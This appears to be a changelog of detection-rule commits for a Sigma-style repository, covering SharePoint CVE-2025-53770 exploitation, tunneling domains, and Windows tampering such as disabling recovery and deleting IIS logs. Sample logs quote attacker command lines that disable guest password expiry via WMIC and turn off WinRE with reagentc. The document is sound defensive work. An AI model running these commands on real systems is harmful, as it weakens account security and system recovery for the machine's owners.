rules-emerging-threats/2025/Exploits/CVE-2025-53770/file_event_win_exploit_cve_2025_53770.yml, rules-emerging-threats/2025/Exploits/CVE-2025-53770/proc_creation_win_exploit_cve_2025_53770_indicators.yml, rules-emerging-threats/2025/Exploits/CVE-2025-53770/web_win_iis_exploit_cve_2025_53770.yml
feat: potential sharepoint cve-2025-53770 exploitation 
new: Potential SharePoint ToolShell CVE-2025-53770 Exploitation
new: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators
new: SharePoint ToolShell CVE-2025-53770 Exploitation - Web IIS
Ref: https://www.linkedin.com/posts/mauricefielenbach_sharepoint-incidentresponse-windowssecurity-activity-7352653907363303425-bL2f/
=>  feat: potential sharepoint cve-2025-53770 exploitation 

rules/windows/network_connection/net_connection_win_domain_devtunnels.yml
Added Protocol Tunneling (T1562) and the command and control tactic.
update: Network Connection Initiated To DevTunnels Domain - MITRE tags
=> Update net_connection_win_domain_devtunnels.yml Mitre technique and tactics

rules/windows/network_connection/net_connection_win_domain_ngrok.yml
Added:
- Command and Control Tactic
- T1572 - Protocol Tunneling
- T1102 - Web Service (Command and Control technique)
Modified:
- T1567.001 > T1567 - Ngrok is not a code repository.
fix: Process Initiated Network Connection To Ngrok Domain - fix title and update MITRE tags
=> Update net_connection_win_domain_ngrok.yml Mitre technique and tactics

rules/windows/network_connection/net_connection_win_domain_vscode_tunnel_connection.yml
I've added the T1572 (Protocol Tunneling) technique and the command and control tactic.
update: Network Connection Initiated To Visual Studio Code Tunnels Domain - MITRE tags
The technique is pretty self explanatory in this case as it attempt to detect a tunneling tool.
=> Update net_connection_win_domain_vscode_tunnel_connection.yml Mitre Techniques

rules/windows/process_creation/proc_creation_win_wmi_password_never_expire.yml
This rule detects use of wmic.exe to modify user account settings and explicitly disable password expiration, as was seen used by attackers [HERE](https://www.huntress.com/blog/the-unwanted-guest).
new:  Password Never Expires Set via WMI
Process Information:
New Process ID:		0x2fc4
New Process Name:	C:\Windows\System32\wbem\WMIC.exe
Token Elevation Type:	TokenElevationTypeDefault (1)
Mandatory Label:		Mandatory Label\High Mandatory Level
Creator Process ID:	0x2168
Creator Process Name:	C:\Windows\System32\cmd.exe
Process Command Line:	wmic  useraccount where name='guest' set passwordexpires=false
=> [New Rule] - Password Never Expires Set via WMI

rules/windows/registry/registry_set/registry_set_disable_windows_event_log_access.yml
fix: Windows Event Log Access Tampering Via Registry
=> fix: Windows Event Log Access Tampering Via Registry

rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml
Fixes a false positive where PowerShell files get written to the ClipChamp folder
fix: false positive with svchost.exe / writing to clipchamp folder
```
EventID: 11 
Provider_Name: Microsoft-Windows-Sysmon 
Provider_Guid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} 
Version: 2 
Level: 4 
Task: 11 
Opcode: 0 
Keywords: 0 
TimeCreated_SystemTime: 2025-06-16T09:23:32.6013373Z 
EventRecordID: 7779547 
Correlation_ActivityID:  
Execution_ProcessID: 3304 
Execution_ThreadID: 848 
Channel: Microsoft-Windows-Sysmon/Operational 
Computer: XXXXX
Security_UserID: S-1-5-18 
RuleName: - 
UtcTime: 2025-06-16 09:23:32.595 
ProcessGuid: {9c1a72f7-e107-684f-e9a6-030000001a00} 
ProcessId: 6316 
Image: C:\Windows\system32\svchost.exe 
TargetFilename: C:\Program …
```
=> fix: FPs with ClipChamp

rules/windows/process_creation/proc_creation_win_reagentc_disable_windows_recovery_environment.yml, rules/windows/process_creation/proc_creation_win_windows_recovery_disabled_reagentc.yml
This rule detects attempts to disable windows recovery environment using Reagentc, as was seen [HERE](https://www.elastic.co/security-labs/maas-appeal-an-infostealer-rises-from-the-ashes).
ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).
It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.
new: Windows Recovery Disabled via Reagentc
Process Information:
New Process ID:		0x2af8
New Process Name:	C:\Windows\System32\ReAgentc.exe
Token Elevation Type:	TokenElevationTypeDefault (1)
Mandatory Label:		Mandatory Label\High Mandatory Level
Creator Process ID:	0x2168
Creator Process Name:	C:\Windows\System32\cmd.exe
Process Command Line:	reagentc  /disable
- If your PR …
=> [New Rule] - Windows Recovery Disabled via Reagentc

rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml, rules/windows/process_creation/proc_creation_win_sc_create_service.yml, rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml, rules/windows/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml
fix - Potential Persistence Via Notepad++ Plugins - filter notepad++ installer
fix - New Service Creation Using Sc.EXE - filter dropbox
fix - Potential PsExec Remote Execution - add filter for localhost
fix - Potential Defense Evasion Via Raw Disk Access By Uncommon Tools - add filter for mpDefenderCoreService and SysWow64
=> Fix some more aurora fps

rules/windows/file/file_delete/file_delete_win_delete_iis_access_logs.yml, rules/windows/process_creation/proc_creation_win_iis_logs_deletion.yml
new: IIS WebServer Log Deletion via CommandLine Utilities
=> feat: iis webserver logs deletion
